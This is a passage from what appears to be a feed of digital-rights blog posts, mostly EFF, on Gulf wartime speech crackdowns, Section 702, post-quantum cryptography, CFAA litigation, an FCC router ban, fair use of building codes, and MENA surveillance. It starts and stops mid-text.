JLD: This is actually a really tough question for me because I don't actually think I have one, to be honest. I want to push back on the idea of having a single hero. Because, freedom of speech—any freedom or liberty that we have today—has never been secured by one individual alone. It has been fought for by movements. The eight-hour workday, unions, women's suffrage, despite that it was just white women who were first able to vote, and so on and so forth. It was fought for by movements, by working class people, whose names we often forget. Because a lot of movements in history, the public memory of a movement narrows it down to a single figure, often male. Movement starts from the people, because the movement would not be sustained without the drive of the working people who dedicated free, unpaid labor for it to succeed. Because without them, I don't think there would be any movement to speak of. Without them there's no platform from which any of these figures could actually emerge. 

  • War as a Pretext: Gulf States Are Tightening the Screws on Speech—Again
    by Jillian C. York on April 13, 2026 at 3:29 pm

    War does not only reshape borders. It also reshapes what can be seen, said, and remembered.  When governments invoke “misinformation” during wartime, they often mean something simpler: speech they do not control. Since the escalation of conflict between the United States, Israel, Iran, and related spillover attacks in the Gulf, several governments have intensified efforts to silence dissent and restrict the flow of information. Journalism under pressure For journalists, the space to operate—already constrained in much of the Gulf—is narrowing further. Across the region, several countries (including the UAE, Qatar, and Jordan) have restricted access to conflict areas, warned of legal consequences for publishing footage, and drawn red lines around wartime reporting. These measures weaken independent coverage, elevate official narratives, and make it harder for the public to get an accurate account of events on the ground. Reporters Without Borders has documented an intensifying crackdown on journalists across Gulf countries and Jordan, including restrictions on reporting, legal threats, and heightened risks for those who deviate from official narratives. This aligns with the broader warning from the UN that repression of civic space and freedom of expression has significantly deepened across the region during the war. Criminalizing speech, one post at a time For ordinary internet users, the restrictions are just as severe. Since February, hundreds of people have reportedly been arrested across the region for social media activity linked to the war. In many Gulf states, the legal infrastructure enabling this is already well-established: expansive cybercrime and media laws criminalize vaguely defined offenses such as “spreading rumors,” “undermining public order,” or “insulting the state”. In wartime, these provisions become catch-all tools: flexible enough to apply to nearly any form of dissent. 
In Bahrain, authorities have reportedly cracked down on people who protested or shared footage of the conflict online. The Gulf Centre for Human Rights has reported 168 arrests in the country tied to protests and online expression, with defendants potentially facing serious prison terms if convicted. In the UAE, authorities have arrested nearly 400 people for recording events related to the conflict and for circulating information they described as misleading or fabricated. Police have claimed this material could stir public anxiety and spread rumors, and state-linked reporting has described the crackdown as part of a broader effort to defend the country from digital misinformation. Saudi Arabia has also intensified restrictions, issuing a statement on March 2 banning the sharing of rumors or videos of unknown origin, and issuing a campaign discouraging residents from taking or posting photos. The campaign included a hashtag that reads “photography serves the enemy.” Journalists have been prevented from documenting the aftermath of airstrikes on the country. Kuwait, Qatar, and Jordan have adopted similar restrictions on wartime imagery and reporting. Qatar’s Interior Ministry has arrested more than 300 people for filming, circulating, or publishing what the ministry deemed to be misleading information. Taken together, these measures show how quickly wartime speech is being folded into existing legal systems designed to punish dissent. The regional playbook What’s striking is how consistent these measures are across different countries. As we recently wrote, governments across the broader region have enacted sweeping cybercrime and media laws over the past fifteen years, which they are now putting to use. Across different countries, the same tools are being used: existing laws, fresh bans on sharing wartime imagery, and tighter restrictions on journalists and reporting. 
The vocabulary changes slightly from place to place, but the logic is the same: national security, public order, rumors, and social stability are justifications for control. This is not just a series of isolated incidents. It is a regional playbook for silencing critics and narrowing the public record. Gulf states have long relied on censorship and surveillance; the war has simply made those methods easier to justify and harder to challenge. From “digital hopes” to digital control As we’ve documented in our ongoing blog series, digital platforms were once seen—at least in part—as spaces that could expand public discourse in the region. But as we’ve also argued, those early “digital hopes” have given way to systems of regulation and control.  The current crackdown is a continuation of that trajectory, not a temporary departure from it. States are not just reacting to the war; they are leveraging it to consolidate long-standing ambitions to dominate the digital public sphere. It may be tempting to see these measures as temporary, but emergency powers—like the one enacted in Egypt following the 1981 assassination of Anwar Sadat that lasted for more than three decades—have a way of sticking around. Legal precedents that are set during wartime often become normalized—or reinvoked during times of crisis, as occurred in 2015, when France brought back a 1955 law related to the Algerian War of Independence amidst the Paris attacks. And the stakes are high. As we’ve seen in Syria and Ukraine, regulations and platform policies can cause wartime human rights documentation to disappear. When journalists are constrained and eyewitness footage is criminalized, accountability is weakened. And when arrests become widespread, people learn to self-censor. Protecting freedom of expression in times of conflict is a requirement for accountability, not a concession to disorder. 
When people can document, report, and share information freely, it becomes harder for abuses to be hidden behind official narratives. Even in wartime, the public interest is best served by defending the space to tell the truth, not by silencing speech.

  • Trump Torches MAGA — Blasts His Biggest (Now Former) Supporters
    by Daniel McAdams on April 10, 2026 at 4:36 pm

    President Trump has shown a curious characteristic of turning on those who want to hold him to account. Right at the beginning, we had the falling out with Elon Musk over the Big Beautiful Bill. Then, to Trump voters who wanted accountability on the Epstein Files, the president wrote: “I don’t want their support anymore.” The post Trump Torches MAGA — Blasts His Biggest (Now Former) Supporters appeared first on LewRockwell.

  • We Need You: Our Privacy Cannot Afford a Clean Extension of Section 702
    by Matthew Guariglia on April 10, 2026 at 1:50 pm

    We go through this every couple of years: Section 702 of the Foreign Intelligence Surveillance Act (FISA), which of Americans’ communications with foreign persons overseas is up for renewal. As always, Congress can reauthorize it with or without changes, or just let it expire. We know, we know, it’s a pain to have to do this every few years–but it gives us a chance to lift the hood of this behemoth tool of government surveillance and tinker with how it works. That’s why it’s so important right now to urge your Member of Congress not to pass any bill that reauthorizes Section 702 without substantial reforms.    Take action TELL congress: 702 Needs Reform Section 702 is rife with problems, loopholes, and compliance issues that need fixing. The National Security Agency (NSA) collects full conversations being conducted by surveillance targets overseas and stores them, allowing the Federal Bureau of Investigation (FBI) to operate in a “finders keepers” mode of surveillance—they reason that it's already collected, so why can’t they look at those conversations? There, the FBI can query and even read the U.S. side of that communication without a warrant. The problem is, people who have been spied on by this program won’t even know and have very few ways of finding out. EFF and other civil liberties advocates have been trying for years to know when data collected through Section 702 is used as evidence against them.   There’s simply no excuse for any Member of Congress to support a "clean" reauthorization of Section 702. Anyone who votes to do so does not take your privacy seriously. Full stop.   The intelligence community and its defenders in Congress, as always, seem more interested in defending their rights to read your private communications than in protecting your right to privacy. It’s not really a compromise between safety and privacy if it's always your privacy that gets sacrificed. Now, we’re drawing a line in the sand: Congress cannot pass a clean extension.   
Use this EFF tool to write to your Member of Congress and tell them not to pass a clean reauthorization of Section 702.   Take action TELL congress: 702 Needs Reform

  • Yikes, Encryption’s Y2K Moment is Coming Years Early
    by Erica Portnoy on April 9, 2026 at 9:32 pm

    Google moved up its estimated deadline for quantum preparedness in cryptography to 2029—only 33 months from now. That’s earlier than previous deadlines, and they proposed the new post-quantum migration deadline because of two new papers that comprise a big jump in the state of the technology. It’s ahead of schedule, but not altogether unexpected. Cryptographers and engineers have been working on this for years, and as the deadline gets closer, it’s not surprising to see more precise timeline estimates come up. The preparation for the Y2K bug is not a perfect analogy. Like Y2K, if systems are not updated in time, anyone with a powerful enough quantum computer will be able to more easily insert malware into the core systems of a computer and fake authentication to allow impersonation merely by observing network traffic. These are the threats whose mitigation timelines have been moved up. But unlike Y2K, there’s a second sort of attack that we already need to be prepared for: quantum computers will be able to decrypt years of captured messages sent over encrypted messaging platforms shared any time before those platforms updated to quantum-proof encryption. That type of attack has been the main focus of engineering efforts so far and mitigation is well on its way, since anything before the upgrade might eventually be compromised. Fortunately, not all cryptography is broken by quantum computers. Notably, symmetric encryption is quantum resistant. That means that if you have disk encryption turned on, you shouldn’t have to worry about quantum computers breaking into your phone, as long as your system’s keys are long enough. The problem is how you get the keys to do that encryption, and how you authenticate software on your device and in the cloud. Engineers: Time to Lock In For those whose work touches on any sort of cryptographic deployment, you’re hopefully already working on the post-quantum transition. 
If not, you really should be; there are quite a few relevant posts and updates with more information about what this news means for you. Your key agreement systems should be upgraded soon if they’re not already because of store-now-decrypt-later attacks. Now it’s time to prepare for authentication attacks on forged signatures as well. In some cases, you may need to wait on others to finish their work first. If you’re using NGINX to host websites on Ubuntu, for example, the security settings you need to upgrade key agreement were just released in version 26.04. Updates are rolling out, so keep checking in and upgrade your systems as soon as you’re able to. Users: Stay Updated, Check on Your Chats But if you’re not in any position to be updating software or hardware, there may be some additional steps you can take to make sure you're as protected as possible. You’ll want to get the latest post-quantum protections as soon as they're available, so if you don't already have a habit of applying software updates in a timely manner, now’s a good time to start. If you want to know if the website you’re using or the encrypted messaging app you’re chatting over will leak its data in a few years to anyone storing traffic now, you can search for its name with the word "quantum." The engineers are usually pretty proud of their work and have announced their post-quantum support (like what we’ve seen from Signal and iMessage). If you can’t find that information, you may want to have extra consideration for what you say over the internet, or switch the tools you're using. Those are the big areas to worry about now, before quantum computers are actually here, because they could result in the mass leakage of old messages. The new deadline means that some technologies are simply not going to make it in time and will have to be left by the wayside, like trusted execution environments (TEEs), due to the slower speed of hardware deployments. 
TEEs are how companies do private processing on user data in the cloud, and they’re particularly relevant to AI offerings.  Even now, though they offer more protection than processing data in the clear, TEEs are not as secure as homomorphic encryption or doing the processing on device. Post-quantum, the security level gets much closer to computation on cleartext, and even with strong user controls, that makes it way too easy to accidentally backdoor your own encrypted chats. If you’re worried about the contents of messages in an encrypted chat being exposed, you’ll probably want to completely avoid using AI features that might leak that content, such as summarization of recent chat history and notifications, and reply composition assistance.  How’s the Transition Going So Far? The work to update the world to post-quantum is well on its way. NIST finalized the standards for post-quantum cryptographic algorithms back in 2024. The larger platforms, websites, and hosting providers have already updated their algorithms, so even now, you’re probably already using post-quantum algorithms to access some of the internet. Measurements vary pretty widely, but up to about 4 in 10 websites currently support a post-quantum key exchange. There’s still some work to be done in figuring out how to make the needed changes—for example, the way you find out a website’s private key to make HTTPS possible is being reworked to make room for larger signatures. Some technologies are just coming to market, like the post-quantum root of trust available now in some Chromebooks. In practice, this means that as you think about replacing your current devices in the next few years, you may want to check if you’re picking up hardware that has post-quantum support, if those specific protections are required for your threat model. For the areas that still need updating, how much can we expect to actually get ready by the new deadline? 
It’s likely that not every cryptographically-capable device and deployment will be ready in time, and hardware with hard-coded certificates will probably be the last to update. We saw that happen when SHA-1 was deprecated; Point of Sale systems in particular were late adopters. While governments and large companies with quantum computers may not be interested in stealing money from cash registers, they will be interested in accessing secrets about people’s private lives. That’s why it’s so important that everyone does their part to upgrade, to protect the details of private communications and browsing.  And there’s a good chance that older devices that won’t receive quantum-resistant updates were probably vulnerable to some other attack already. Quantum computation is just one type of attack on cryptography that’s notable for the scale of migration required, and how every public-key cryptosystem and authentication scheme has to do the work to prepare. That’s not a difference in kind, it’s a difference in scale, and some systems will inevitably be left behind. Quantum preparedness hits different industries and services in different ways, but services that handle communications and financial information are particularly susceptible to risk, and need to act quickly to protect the privacy and security of billions of people.

  • Comparison Shopping Is Not a (Computer) Crime
    by Corynne McSherry on April 9, 2026 at 5:20 pm

    As long as people have had more than one purchasing option, they’ve been comparing those options and looking for bargains. Online shoppers are no exception; in fact, one of the potential benefits of the internet is that it expands our options for everything from car rentals to airline tickets to dish soap. New AI tools can make the process even easier. These tools could provide some welcome relief for consumers facing sky-high prices that many cannot afford. Unfortunately, Amazon is trying to block these helpful new tools, which can steer shoppers towards competitors. Taking a page from Facebook and RyanAir, they are trying to use computer crime laws to do it.  Amazon’s target is Perplexity, which makes an AI-enabled web browser, called Comet, that allows users to browse the web as they normally would, but can also perform certain actions on the user’s behalf. For example, a user could ask Comet to find the best price on a 24-pack of toilet paper, and if satisfied with the results, have the browser order it. Amazon claims that Perplexity violated the Computer Fraud and Abuse Act (CFAA) by building a tool that helps users access information on Amazon and engage with the site. Unfortunately, a federal district court agreed. The court’s fundamental mistake: relying on the Ninth Circuit’s misguided decision in Facebook v Power Ventures, rather than the court’s much better and more applicable reasoning in hiQ Labs. Perplexity has appealed to the Ninth Circuit. As we explain in an amicus brief filed in support, the district court’s mistake, if affirmed, could lead to myriad unintended consequences. Overbroad readings of the CFAA have undermined research, security, competition, and innovation. For years, we’ve worked to limit its scope to Congress’s original intention: actual hacking that bypasses computer security. It should have nothing to do with Amazon’s claims here, not least because most of Amazon’s website is publicly available. 
The court’s approach would be especially dangerous for journalists and academic researchers. Researchers often create a variety of testing accounts. For example, if they’re researching how a service displays housing offers, they may create separate accounts associated with different race, gender, or language settings. These sorts of techniques may be adversarial to the company, but they shouldn’t be illegal. But according to the court’s opinion, if a company disagrees with this sort of research, it need not merely ban the researchers from using the site; it can render that research criminal simply by sending a letter notifying the researcher that they’re not authorized to use the service in this way. A broad reading of the CFAA in this case would also undermine competition by enabling companies to limit data scraping, effectively cutting off one of the ways websites offer tools to compare prices and features. The Ninth Circuit should follow Van Buren’s lead and interpret the CFAA narrowly, as Congress intended. Website owners do not need new shields against independent accountability. Related Cases: Facebook v. Power Ventures

  • EFF is Leaving X
    by Kenyatta Thomas on April 9, 2026 at 4:25 pm

    After almost twenty years on the platform, EFF is logging off of X. This isn’t a decision we made lightly, but it might be overdue. The math hasn’t worked out for a while now. The Numbers Aren’t Working Out We posted to Twitter (now known as X) five to ten times a day in 2018. Those tweets garnered somewhere between 50 and 100 million impressions per month. By 2024, our 2,500 X posts generated around 2 million impressions each month. Last year, our 1,500 posts earned roughly 13 million impressions for the entire year. To put it bluntly, an X post today receives less than 3% of the views a single tweet delivered seven years ago.  We Expected More When Elon Musk acquired Twitter in October 2022, EFF was clear about what needed fixing.  We called for:  Transparent content moderation: Publicly shared policies, clear appeals processes, and renewed commitment to the Santa Clara Principles Real security improvements: Including genuine end-to-end encryption for direct messages Greater user control: Giving users and third-party developers the means to control the user experience through filters and interoperability. Twitter was never a utopia. We've criticized the platform for about as long as it’s been around. Still, Twitter did deserve recognition from time to time for vociferously fighting for its users’ rights. That changed. Musk fired the entire human rights team and laid off staffers in countries where the company previously fought off censorship demands from repressive regimes. Many users left. Today we're joining them.  "But You're Still on Facebook and TikTok?"  Yes. And we understand why that looks contradictory. Let us explain.  EFF exists to protect people’s digital rights. Not just the people who already value our work, have opted out of surveillance, or have already migrated to the fediverse. The people who need us most are often the ones most embedded in the walled gardens of the mainstream platforms and subjected to their corporate surveillance.  
Young people, people of color, queer folks, activists, and organizers use Instagram, TikTok, and Facebook every day. These platforms host mutual aid networks and serve as hubs for political organizing, cultural expression, and community care. Just deleting the apps isn't always a realistic or accessible option, and neither is pushing every user to the fediverse when there are circumstances like: You own a small business that depends on Instagram for customers. Your abortion fund uses TikTok to spread crucial information. You're isolated and rely on online spaces to connect with your community. Our presence on Facebook, Instagram, YouTube, and TikTok is not an endorsement. We've spent years exposing how these platforms suppress marginalized voices, enable invasive behavioral advertising, and flag posts about abortion as dangerous. We’ve also taken action in court, in legislatures, and through direct engagement with their staff to push them to change poor policies and practices. We stay because the people on those platforms deserve access to information, too. We stay because some of our most-read posts are the ones criticizing the very platform we're posting on. We stay because the fewer steps between you and the resources you need to protect yourself, the better.  We'll Keep Fighting. Just Not on X When you go online, your rights should go with you. X is no longer where the fight is happening. The platform Musk took over was imperfect but impactful. What exists today is something else: diminished, and increasingly de minimis. EFF takes on big fights, and we win. We do that by putting our time, skills, and our members’ support where they will effect the most change. Right now, that means Bluesky, Mastodon, LinkedIn, Instagram, TikTok, Facebook, YouTube, and eff.org. We hope you follow us there and keep supporting the work we do. Our work protecting digital rights is needed more than ever before, and we’re here to help you take back control.

  • Banning New Foreign Routers Mistargets Products to Fix Real Problem
    by Bill Budington on April 8, 2026 at 7:24 pm

    On March 23, the FCC issued an update to their Covered List, a list of equipment banned from obtaining regulatory approval necessary for U.S. sale (and thus effectively a ban on sale of new devices), to include all new routers produced in foreign countries unless they are specifically given an exception by the Department of Defense (DoD) or DHS. The Commission cited “security gaps in foreign-made routers” leading to widespread cyberattacks as justification for the ban, mentioning the high-profile attacks by Chinese advanced persistent threat actors Volt, Flax, and Salt Typhoon. Although the stated intention is to stem the very real threat of domestic residential routers being commandeered to initiate attacks and act as residential proxies, this sweeping move serves as a blunt instrument that will impact many harmless products. In addition to being far too broad, it won’t even affect many vulnerable devices that are most active in these types of attacks: IoT and connected smart home devices. Previously, the FCC had changed the Covered List to ban hardware by specific vendors, such as telecom equipment produced by companies Huawei and Hytera in 2021. This new blanket ban, in contrast, affects the importation and sale of almost all new consumer routers. It does not affect consumer routers produced in the United States, like Starlink in Texas. While some of the affected routers will be vulnerable to compromises that hijack the devices and use them for cybercrime and attacks, this ban does not distinguish between companies with a track-record of producing vulnerable products and those without. As a result, instead of incentivizing security-minded production, this will only limit the options consumers have to US-based manufacturers not affected by the ban—even those that lack stellar security reputations themselves. While the sale of vulnerable routers in the U.S. 
will not stop, the announcement quoted an Executive Branch determination that foreign-produced routers introduce “a supply chain vulnerability that could disrupt the U.S. economy, critical infrastructure, and national defense.” Yet this move does nothing to address the growing number of connected devices involved in the attacks this ban aims to address. As we have previously pointed out, supply chain attacks have resulted in no-name Android TV boxes preloaded with malware, sold by retail giants like Amazon, fueling the massive Kimwolf and BADBOX 2 fraud and residential proxy botnets. Banning the specific models and manufacturers we know produce dangerous devices that put their purchasers at risk, rather than issuing blanket bans punishing reputable brands that do better, should be the priority. With the FCC’s top commissioner appointed by the President, this ban comes as other parts of the administration impose tariffs and issue dozens of trade-related executive orders aimed at foreign goods. A few larger companies with pockets deep enough to invest in manufacturing plants within the U.S. may see this as an opportune moment, while others not as well poised to begin U.S. operations may attempt to curry enough favor to be added to the DoD or DHS exception lists. At best, this will result in the immediate effect of an ill-targeted policy that does little to improve domestic cybersecurity posture. At worst, it entrenches existing players and deepens problematic quid-pro-quo arrangements. American consumers deserve better. They deserve the assurance that the devices they use, whether routers or other connected smart home devices, are built to withstand attacks that put themselves and others at risk, no matter where they are manufactured. For this, a nuanced, careful consideration of products (such as was part of the FCC’s 2023-proposed U.S. Cyber Trust Mark) is necessary, rather than blanket bans.

  • Another Court Rules Copyright Can’t Stop People From Reading and Speaking the Law
    by Mitch Stoltz on April 8, 2026 at 6:13 pm

    Another court has ruled that copyright can’t be used to keep our laws behind a paywall. The U.S. Court of Appeals for the Third Circuit upheld a lower court’s ruling that it is fair use to copy and disseminate building codes that have been incorporated into federal and state law, even though those codes are developed by private parties who claim copyright in them. The court followed the suggestions EFF and others presented in an amicus brief, and joined a growing list of courts that have placed public access to the law over private copyright holders’ desire for control. UpCodes created a database of building codes—like the National Electrical Code—that includes codes incorporated by reference into law. ASTM, a private organization that coordinated the development of some of those codes, insists that it retains copyright in them even after they have been adopted into law, and therefore has the right to control how the public accesses and shares them. Fortunately, neither the Constitution nor the Copyright Act supports that theory. Faced with similar claims, some courts, including the Fifth Circuit Court of Appeals, have held that the codes lose copyright protection when they are incorporated into law. Others, like the D.C. Circuit Court of Appeals in a case EFF defended on behalf of Public.Resource.Org, have held that, whether or not the legal status of the standards changes once they are incorporated into law, making them fully accessible and usable online is a lawful fair use. In this case, the Third Circuit found that UpCodes’s copying of the codes was a fair use, in a decision closely following the D.C. Circuit’s reasoning. Fair use turns on four factors listed in the Copyright Act, and the court found that all four favored UpCodes to some degree.
On the first factor, the purpose and character of the use, the court found that UpCodes’s use was “transformative” because it had a separate and distinct purpose from ASTM—informing people about the law, rather than just best practices in the building industry. No matter that UpCodes was copying and disseminating entire safety codes verbatim—using the codes for a different purpose was enough. And UpCodes being a commercial venture didn’t change the outcome either, because UpCodes wasn’t charging for access to the codes. On the second factor, the nature of the copyrighted work, the Third Circuit joined other appeals courts in finding that laws are facts, and stand at “the periphery of copyright’s core protection.” And this included codes that were “indirectly” incorporated—meaning that they were incorporated into other codes that were themselves incorporated into law. The third factor looks at the amount and substantiality of the material used. The court said that UpCodes could not have accomplished its purpose—providing access to the current binding laws governing building construction—without copying entire codes, so the copying was justified. Importantly, the court noted that UpCodes was justified in copying optional parts of the codes as well as “mandatory” sections because both help people understand what the law is. Finally, the fourth factor looks at potential harm to the market for the original work, balanced against the public interest in allowing the challenged use. The court rejected an argument frequently raised by copyright holders—that harm can be assumed any time materials are posted to the internet for all to access. Instead, the court held that when a use is transformative, a rightsholder has to bring evidence of harm, and that harm will be balanced against the public benefit. 
Because “enhanced public access to the law is a clear and significant public benefit,” and ASTM hadn’t shown significant evidence that UpCodes had meaningfully reduced ASTM’s revenues, the fourth factor was at least neutral. It didn’t matter to the court that ASTM offered to provide copies of legally binding standards to the public on request, because “the mere possibility of obtaining a free technical standard does not nullify the public benefits associated with enhanced access to law.” This is a good result that will expand the public’s access to the laws that bind us—something that’s more important than ever given recent assaults on the rule of law. In the future, we hope that courts will recognize that codes and standards lose copyright when they are incorporated into law, so that people don’t have to spend years and legal fees litigating fair use just to exercise their rights.

  • 👁 Selling Mass Surveillance | EFFector 38.7
    by Christian Romero on April 8, 2026 at 4:24 pm

    Time and time again, we've seen police surveillance suffer from 'mission creep'—technology sold as a way to prevent heinous crimes ends up enforcing traffic violations, tracking protestors, and more. In our latest EFFector newsletter, we're diving into this troubling pattern and sharing all the latest in the fight for privacy and free speech online. JOIN OUR NEWSLETTER For over 35 years, EFFector has been your guide to understanding the intersection of technology, civil liberties, and the law. This week's issue covers the urgent need to reform NSA spying; a victory for internet access in the Supreme Court; and how license plate readers are normalizing mass surveillance. Prefer to listen in? EFFector is now available on all major podcast platforms. This time, we're chatting with EFF Privacy Litigation Director Adam Schwartz about some of the recent technologies we've seen suffer from "mission creep." And don't miss the EFFector news quiz! You can find the episode and subscribe on your podcast platform of choice:  %3Ciframe%20height%3D%22200px%22%20width%3D%22100%25%22%20frameborder%3D%22no%22%20scrolling%3D%22no%22%20seamless%3D%22%22%20src%3D%22https%3A%2F%2Fplayer.simplecast.com%2F2ff7f80b-1fbe-4013-97b6-43873a6785ac%3Fdark%3Dfalse%22%20allow%3D%22autoplay%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from simplecast.com     Want to help us push back against mass surveillance? Sign up for EFF's EFFector newsletter for updates, ways to take action, and new merch drops. You can also fuel the fight for privacy and free speech online when you support EFF today!

  • Digital Hopes, Real Power: How the Arab Spring Fueled a Global Surveillance Boom
    by Sarah Hamid on April 8, 2026 at 8:22 am

    This is the third installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. You can read the first post here, and the second here. When people recall the 2011 uprisings across the Middle East and North Africa (MENA), they often picture crowded squares, raised phones, and the feeling that the internet had finally shifted the balance of power toward ordinary people. But the past decade and a half is also a story about how governments, companies, and platforms turned those same tools into the backbone of a powerful state surveillance apparatus. For activists, journalists, everyday users, that means now living with a constant threat. The phone in your pocket, the platforms you organize on, and the systems you rely on for safety and connection can be weaponized at the flip of a switch. A global surveillance industry has treated repression by many MENA governments as a growth opportunity, and the tactics refined there now shape digital authoritarianism worldwide. This essay traces how that shift unfolded: security agencies upgraded older systems of repression with new surveillance tools and permanent monitoring infrastructure; cybercrime laws and mercenary spyware markets turned digital control into standard operating procedure; and biometrics, facial recognition, and ‘smart city’ projects laid the groundwork for AI‑driven surveillance that now shapes protests, borders, and everyday life far beyond the region.  Remembering the Arab Spring means seeing the events of 2011 as both a remarkable moment of movement history when people leveraged networked tools in their fight for freedom and the beginning of a long, grinding effort to turn those same tools into mechanisms of state control. Old‑School Repression, New‑School Tools Long before Facebook and Twitter, regimes in countries like Egypt and Syria already knew how to crush dissent. 
They leaned on informant networks, physical surveillance, and wiretaps, backed by emergency laws that let security agencies monitor and detain critics with almost no restraint. Research on the use of surveillance technology in MENA shows that, even before the Arab Spring, states were layering early digital tools like internet monitoring, deep packet inspection, and interception centers on top of that older machinery of control. At the same time, connectivity was racing ahead. Cheap smartphones and social media suddenly let people share information at scale, coordinate protests, and broadcast abuses in real time. In 2011, EFF described both the excitement around “Facebook revolutions” and the early signs that governments were scrambling to upgrade their capacity to watch and disorganize popular dissent. After the uprisings, Western critics endlessly debated how much credit to give social media itself. Meanwhile, in the background, security agencies across several MENA states reached a much simpler conclusion: if networked communication could help topple a dictator, then they needed to embed themselves deep inside those networks. Analyses of the rise of digital authoritarianism in MENA show how quickly officials pivoted from being surprised by online organizing to building systems to monitor and pre‑empt it. In the years after 2011, governments across the region poured money into tools that let them systematically watch what people said and did on major platforms. Foreign vendors set up monitoring centers and interception systems that let security agencies block tens of thousands of sites, scrape and analyze social media at scale, monitor activist pages and online communities, and track activists in real time. They built a new, pre‑emptive model of digital control, one that assumes the state should see as much as possible, as early as possible.
As we noted in 2011, exporting permanent surveillance infrastructure to already‑abusive governments doesn’t “modernize” public safety; it locks in an architecture of control that is primed to abuse dissidents, journalists, and marginalized communities. Domestic Lawfare and Cyber-Mercenaries After the uprisings, a number of governments also rewrote the rules that govern online life. Cybercrime laws, “fake news” provisions, and overbroad public‑order and ‘morality’ offences gave prosecutors and security agencies legal cover to act with impunity. Governments in Saudi Arabia, Tunisia, Jordan, and Egypt combined counterterrorism, cybercrime, defamation, and protest laws into a legal thicket designed to make online dissent feel dangerous and costly. Morality laws and cybercrime provisions are used to target queer and trans people based on identity and expression.​ At the United Nations, a new global cybercrime convention now risks baking this logic into international law. The convention was adopted by the UN General Assembly in late 2024, despite serious human rights concerns raised by civil society. Echoing our partners, EFF warned at the time that the UN cybercrime draft convention remained too flawed to adopt and urged states to reject the draft language because it legitimized expansive surveillance powers and criminalized legitimate expression, security research, and everyday digital practices around the world. While on paper, these instruments gesture to “public safety” objectives, in practice they function as pathways for state security agencies to monitor, prosecute, and silence the communities most at risk. For state-targeted communities, that makes being visible online a calculated risk, not a neutral choice.​​ Criminal codes are only half the story; mercenary tech is the other. As governments worldwide looked for ways to outpace their critics, a parallel market emerged to help them infiltrate and take over devices. 
Companies like NSO Group marketed Pegasus and similar tools as off‑the‑shelf capabilities for governments that wanted to hack a target’s cellphones or other devices to read messages, turn on microphones, and monitor entire social networks while bypassing the courts.  In 2019, UN Special Rapporteur David Kaye called for a global moratorium on the sale and transfer of private surveillance tools until real, enforceable safeguards exist. Two years later, forensic work by Amnesty and media partners showed how the same spyware used to hack phones of Palestinian human‑rights defenders was used to surveil journalists, activists, lawyers, and political opponents across dozens of countries.  Regional groups responded by demanding an end to the sale of surveillance technology to autocratic governments and security agencies, arguing that you cannot keep selling “lawful intercept” tools into systems where law itself is an instrument of repression. Commercial spyware is at the center of digital repression, not at its margins. Surveillance vendors are not neutral suppliers. Safeguards remain weak, fragmented, or nonexistent in most of the countries buying these tools, yet vendors continue seeking new contracts and new militarized “use cases.” Put bluntly, the companies that design, market, and maintain these systems—precisely because those systems enable this kind of control—profit from (and help entrench) authoritarian power. Biometrics, Facial Recognition, and AI‑Powered Surveillance Cities On top of this rapidly intensifying interception and spyware stack, governments and companies began layering biometrics and face recognition into everyday systems, creating pathways for bulk data collection, automated analysis, and risk profiling.
In parts of MENA, national ID schemes, border and migration controls, and centralized biometric databases have been rolled out in environments with weak or captured data‑protection laws, making it easy to link people’s movements, services, and political activity to a single, persistent identifier.​ Humanitarian programs are not exempt from this protocol. In Jordan, Syrian refugees have been required to submit iris scans and biometric data to access cash assistance and food, turning “consent” into a precondition for survival. When access to aid depends on enrollment in centralized biometric systems, any breach, misuse, or repurposing of that data can have severe, life‑altering consequences for people who have no realistic way to opt out. Investigations into surveillance‑tech firms complicit in abuses in MENA show that vendors profit from supplying biometric and surveillance tools for migration management and internal security, even when those tools are used in discriminatory or abusive ways.​ Like elsewhere, mass surveillance technologies in MENA were first piloted on people who were already criminalized or made vulnerable by poverty. But their use quickly expanded from narrow, security‑framed deployments to routine use in city streets. As hardware sensors, cameras, and data storage got cheaper, “smart city” surveillance systems promised seamless security and services, and it became easier and less politically contentious to keep these systems running everywhere, all the time.​ Unlike targeted hacking tools, these broad, city‑wide surveillance infrastructures erase any practical line between people under investigation and the broad public, normalizing bulk, indiscriminate monitoring of public space and everyday movement. In the Gulf, facial recognition and dense sensor networks are increasingly built into high‑profile “smart city” and mega‑project plans that lean heavily on biometric and AI‑driven monitoring. 
These are security‑first development projects where biometric and sensor infrastructures are designed from the outset to embed policing, migration control, and commercial tracking into the urban fabric. In this vision of the Gulf’s “smart city” future—often sold as seamless services and digital opportunity—“smart” is the branding, and pervasive monitoring is the operating principle.​​ EFF has consistently opposed government use of face recognition and biometric surveillance, in some instances calling for outright bans. In contexts that treat peaceful dissent as a security threat, embedding biometric surveillance into everyday infrastructure locks in a balance of power that favors militarized policing and state control. That infrastructure is now the starting point for a new set of risks. Surveillance systems built over the last decade are being repackaged as the foundation for a new generation of “AI‑enabled” defense and security products.  Companies that once focused on video management or perimeter security now advertise “defense applications” for AI‑driven situational awareness and threat detection, using computer‑vision models to scan camera feeds, compare against existing watchlists, and flag “suspicious” people or behaviors in real time. Drone and sensor platforms are being upgraded with embedded AI that tracks and classifies targets autonomously and with “drone‑based AI threat detection and intelligent situational awareness,” turning aerial surveillance into a continuous data feed for security agencies and militaries. In smart‑city and defense expos from the Gulf to Europe and North America, similar systems are marketed as neutral efficiency upgrades or tools to “protect critical infrastructure,” even where they are explicitly designed to scale up border enforcement, protest surveillance, and internal security operations. 
As these systems are folded into AI‑driven defense products, the line between “civilian” infrastructure and militarized surveillance disappears, turning streets, borders, and aid sites into continuous input for security operations. That is the landscape that human rights and accountability efforts now have to confront. Templates of Control, Networks of Resistance The patterns established in heavily securitized MENA states after the Arab Spring now shape how states monitor and crush more recent uprisings, from Iran’s use of location data and facial recognition to track down protesters to long‑running crackdowns elsewhere in the region. This model of “digital authoritarianism” built on spyware, data‑hungry ID systems, platform control, and emergency‑style security laws has emerged everywhere from Latin America to Eastern Europe to here in the United States. As the new UN Cybercrime Convention moves toward implementation, its broad offences and surveillance powers risk turning this ad hoc toolkit into a formal template for cross‑border data‑sharing, repression, and an all‑purpose global surveillance instrument. For people on the ground, none of this is theoretical. Human‑rights defenders, journalists, and ordinary users across the region face arrest, long prison sentences, and exile based on their digital traces. In that context, commercial spyware is not a marginal issue but part of the core machinery of repression. Pegasus has been used to hack journalists’ phones through zero‑click exploits and compromise human‑rights defenders and watchdog organizations themselves, including staff at Amnesty’s Pegasus Project partners and Human Rights Watch. These deployments give practical effect to the “cybercrime” and “terrorism” frameworks described earlier: person‑by‑person campaigns against particular communities, contacts, and networks, rather than “neutral,” generalized security measures. Under these conditions, everyday 